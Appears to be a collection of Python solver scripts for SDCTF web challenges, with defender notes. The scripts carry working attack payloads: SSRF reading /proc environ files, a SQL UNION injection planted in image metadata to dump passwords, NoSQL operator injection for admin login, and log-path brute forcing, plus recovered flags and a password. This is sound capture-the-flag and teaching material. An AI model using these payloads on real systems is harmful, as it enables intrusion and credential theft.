SDCTF web challenge solution
# python3 CurlUp.py | grep "sdctf"
#
# What this shows: the /read/ endpoint is given a base64-encoded JSON object
# with a "url" field, and the script puts file:// URLs in it. The service
# presumably fetches that URL server-side without restricting the scheme
# (not visible here), which turns a URL fetcher into a local file read.
# Defender's takeaway: allow-list schemes (http/https) and destinations in
# any URL-fetching feature, and keep secrets out of process environments
# that such a feature could reach through /proc.
from base64 import b64encode

import requests

URL = 'https://curl.sdc.tf/read/'

# Ask for the environment block of each PID from 1 to 99 in turn.
for pid in range(1, 100):
    body = b'{"url":"file:///proc/%d/environ"}' % pid  # author's note: id=9
    token = b64encode(body).decode("utf-8")
    resp = requests.get(URL + token)
    if "sdctf" not in resp.text:
        continue
    # The flag prefix appeared in the response: print it and stop.
    print(resp.text)
    break
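# What this shows: a UNION SELECT fragment is written into the image's XMP
# dc:description field and the image is uploaded. The upload handler
# presumably interpolates that metadata field into a SQL statement (the
# server code is not visible here).
# Defender's takeaway: metadata embedded in an uploaded file is untrusted
# input like any form field; bind it as a query parameter instead of
# concatenating it into SQL.
import requests
import pyexiv2

URL = 'https://dove.sdc.tf'
IMAGE = "dove.jpg"  # change to your image

# Rewrite the description tag in place on the local copy of the image.
meta = pyexiv2.ImageMetadata(IMAGE)
meta.read()
meta['Xmp.dc.description'] = "' union select 1,(select group_concat(password) from employee_accts),3-- -"
meta.write()

# Context manager so the file handle is closed even if the upload raises
# (the bare open() call previously left it to the garbage collector).
with open(IMAGE, 'rb') as image_file:
    r = requests.post(URL + '/upload', files={'bird': image_file})
print(r.text)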
import random
import string
import sys

import requests

# Base URL of the challenge service; the request helpers append a path to it.
URL = 'https://shell.sdc.tf'
# Shared session, presumably so that state set by /login (cookies) is sent
# with the later /2fa and /buyflagshell requests.
sess = requests.Session()
def ranUser(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random string of `size` characters drawn from `chars`.

    The default alphabet is uppercase ASCII letters plus digits. `random`
    is not a cryptographic generator, so the result is only suitable as a
    throwaway identifier, never as a secret or token.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return ''.join(picked)
def regUser(discord, username, password):
    """POST a signup form (discord, username, password) to URL + '/signup'.

    Sent with a plain `requests.post`, not the shared session, and the
    response is discarded, so a failed signup goes unnoticed here.
    """
    form = {
        "discord": discord,
        "username": username,
        "password": password,
    }
    requests.post(URL + '/signup', data=form)
def loginAdmin(username, password):
    """POST the login form to URL + '/login' through the shared session.

    The password is not sent as a plain `password` field but as the
    bracketed keys `password[$ne]` and `password[length]`. Form parsers
    that expand bracket syntax turn these into a nested object, and a
    MongoDB-style query would read `$ne` as a "not equal" operator rather
    than a value: NoSQL operator injection. Whether the server does this
    is not visible here. `password[length]` is presumably there to satisfy
    a server-side length check; confirm against the challenge source.

    Defender's takeaway: require credential fields to be strings before
    they reach a query, and reject or strip keys that start with `$`.
    """
    form = {
        "username": username,
        "password[$ne]": password,
        "password[length]": "40",
    }
    sess.post(URL + '/login', data=form)
def authenAdmin():
    """Prompt for a 2FA code on stdin and POST it to URL + '/2fa'.

    Uses the shared session, so the request carries whatever state the
    earlier login left in it. The response is not checked.
    """
    entered = input("Enter the code you received: ")
    sess.post(URL + '/2fa', data={"code": entered})
def getFlag():
    """GET URL + '/buyflagshell' with shell=flag-shaped-shell and print the body.

    Goes through the shared session, so it relies on the login and 2FA
    requests made earlier in the same session.
    """
    query = {"shell": "flag-shaped-shell"}
    resp = sess.get(URL + '/buyflagshell', params=query)
    print(resp.text)
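def main():
    """Run the four steps in order: signup, login, 2FA, flag request.

    Expects one command-line argument, which is passed as the `discord`
    field of the signup form. A random username is registered with the
    password "taidh", then the login is attempted for the "admin"
    username. Without an argument, prints the usage line and exits with
    status 1.
    """
    if len(sys.argv) <= 1:
        print("python3 HuMongous.py <your_discord>")
        # sys.exit instead of the site-provided exit(), which is meant for
        # the interactive interpreter and is not guaranteed to exist.
        sys.exit(1)

    username = ranUser()
    discord = sys.argv[1]
    regUser(discord, username, "taidh")
    loginAdmin("admin", "taidh")
    authenAdmin()
    getFlag()


if __name__ == '__main__':
    main()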
# What this shows: the login credentials are taken from the site's own
# client-side script (see the inline note), so anyone who loads the page can
# read them. Each pass logs in again and requests the path built so far; the
# response text becomes the next path segment. The fresh login per request
# is presumably needed because a token is accepted only once (not visible
# here).
# Defender's takeaway: nothing shipped to the browser is secret; keep
# credentials and secret-bearing routes out of client-side code.
import requests

sess = requests.session()
URL = 'https://jawt.sdc.tf'
flag = '/s/'

# Stop once the closing brace of the flag has been collected.
while '}' not in flag:
    creds = {"username": "AzureDiamond", "password": "hunter2"}  # In file /js/login.js
    sess.post(URL + '/login', data=creds)
    print(flag)
    piece = sess.get(f'{URL}{flag}')
    flag += piece.text + '/'

# Drop the path separators to leave the flag text.
print(flag.replace('/', ''))
#sdctf{Th3_m0r3_t0k3ns_the_le55_pr0bl3ms_adf3d}
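# What this shows: log files sit at predictable /logs/<year>/<month>/<day>/
# <weekday>.log paths and can be fetched without authentication, and
# according to the notes at the end one of them contained a password value.
# Defender's takeaway: keep logs out of the web root or behind access
# control, and never write credentials into them.
import string
import datetime

import requests

URL = 'https://logs.sdc.tf/logs/'
CHECK = ['flag','sdctf','password','pass','passwd','admin']

for year in range(2016, 2023):
    for month in range(1, 13):
        for day in range(1, 32):
            # Days 29-31 do not exist in every month; skip those instead of
            # routing them through the generic error printer.
            try:
                d = datetime.datetime(year, month, day).strftime("%a")
            except ValueError:
                continue
            path = f'{year}/{month}/{day}/{d}.log'
            print(URL+path)
            # Only the request can fail here, so only request errors are
            # caught; anything else should surface as a traceback.
            try:
                r = requests.get(URL+path)
            except requests.RequestException as e:
                print(e)
                continue
            # print(r.text)
            # Keywords are matched in Capitalized and UPPER form only.
            if any(key.capitalize() in r.text or key.upper() in r.text for key in CHECK):
                print(r.text)
                print(URL+path)
                # Same exit status as the bare exit(), without depending on
                # the site module providing that name.
                raise SystemExit
#https://logs.sdc.tf/logs/2018/6/13/Wed.log
# nc logger.sdc.tf 1338
#Pass: 82d192aa35a6298997e9456cb3a0b5dd92e4d6411c56af2169bed167b53f38d
#sdctf{b3tr4y3d_by_th3_l0gs_8a4dfd}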